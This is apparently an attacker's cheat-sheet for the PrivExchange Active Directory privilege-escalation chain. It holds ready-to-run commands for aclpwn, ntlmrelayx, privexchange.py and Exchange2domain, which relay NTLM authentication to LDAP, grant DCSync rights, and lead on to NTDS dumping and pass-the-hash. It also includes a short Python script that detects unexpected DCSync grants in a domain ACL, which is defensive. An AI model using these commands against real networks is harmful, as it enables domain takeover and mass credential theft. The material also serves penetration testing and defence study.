PrivExchange

Resources

https://github.com/dirkjanm/PrivExchange
https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin/
https://chryzsh.github.io/exploiting-privexchange/

# After exploitation you are not a Domain Admin directly, so you cannot connect to the
# DC with Domain Admin rights.
# Exploitation gives the user DCSync privileges, which is enough to get the NTDS database.
# You can then use a Pass-the-Hash attack with administrator accounts to get real access.
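
# Defender-side check for the DCSync grant described above (added example, not code from
# PrivExchange or the linked posts): it parses the SDDL of the domain object's DACL and lists
# trustees outside a baseline that hold both replication rights. The EXPECTED baseline, the
# sample SID and the sample SDDL are constructed assumptions.

```python
import re

# Well-known extended-right GUIDs; holding both is what "DCSync privileges" means.
REPL_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
}
CONTROL_ACCESS = 0x100  # ADS_RIGHT_DS_CONTROL_ACCESS, written "CR" in SDDL
# Assumption: baseline of trustees allowed to replicate (SDDL aliases:
# BA = Builtin Administrators, DD = Domain Controllers, ED = Enterprise DCs).
EXPECTED = {"BA", "DD", "ED"}

def has_control_access(rights):
    """True if the SDDL rights field (letter pairs or hex mask) includes CR."""
    if rights.lower().startswith("0x"):
        return bool(int(rights, 16) & CONTROL_ACCESS)
    return "CR" in {rights[i:i + 2] for i in range(0, len(rights), 2)}

def replication_grants(sddl):
    """Map trustee -> replication rights granted by allow ACEs in the DACL."""
    dacl = sddl.partition("D:")[2].partition("S:")[0]
    grants = {}
    for ace in re.findall(r"\(([^()]*)\)", dacl):
        fields = ace.split(";")
        if len(fields) < 6:
            continue
        ace_type, _flags, rights, obj_guid, _inherit_guid, trustee = fields[:6]
        name = REPL_RIGHTS.get(obj_guid.lower())
        if ace_type == "OA" and name and has_control_access(rights):
            grants.setdefault(trustee, set()).add(name)
    return grants

def unexpected_dcsync(sddl, expected=EXPECTED):
    """Trustees outside the baseline that hold both rights (can DCSync)."""
    return sorted(t for t, r in replication_grants(sddl).items()
                  if t not in expected and len(r) == len(REPL_RIGHTS))

# Constructed sample: DACL of a domain head where one extra account holds both rights.
SID = "S-1-5-21-1111111111-2222222222-3333333333-1105"  # constructed SID
SAMPLE_SDDL = (
    "O:BAG:BAD:AI"
    "(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)"
    "(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)"
    "(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)"
    "(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)"
    f"(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;{SID})"
    f"(OA;;0x100;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;{SID})"
    "(A;;RPLCLORC;;;AU)"
)
```

# Only explicit ACEs for the two replication rights are checked; broader grants such as
# full control on the domain object are not covered.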

Aclpwn

# ACLpwn is a tool used to find compromise paths inside BloodHound data and to exploit them
# BloodHound needs to be running
# Many options are available

# The -dry option looks for a compromise path without exploiting it
python aclpwn.py -f user@domain.com -ft user -d domain.com -u user -p password -sp password -du neo4j -dp password -dry

# By default, exploitation is started
python aclpwn.py -f user@domain.com -ft user -d domain.com -u user -p password -sp password -du neo4j -dp password

# You can restore previous privileges after exploitation
python aclpwn.py -r restore-file

ntlmrelayx / privexchange.py

# NTLM relaying is used to relay the connection and grant DCSync privileges
ntlmrelayx.py -t ldap://s2016dc.testsegment.local --escalate-user ntu

# The user needs to have a mailbox to exploit it this way
# After a minute (the value supplied for the push notification) you get the results in ntlmrelayx
python privexchange.py -ah dev.testsegment.local s2012exc.testsegment.local -u testuser -d testsegment.local

# You can also perform the attack without any credentials,
# using the httpattack.py file
# It uses NTLM relaying with LLMNR / NBT-NS to relay captured credentials over the network

Exchange2domain

# All-in-one tool for PrivExchange
# You only need to open the web server port, so no high privileges are required.

# Many options are available
python Exchange2domain.py -ah attackterip -ap listenport -u user -p password -d domain.com -th DCip MailServerip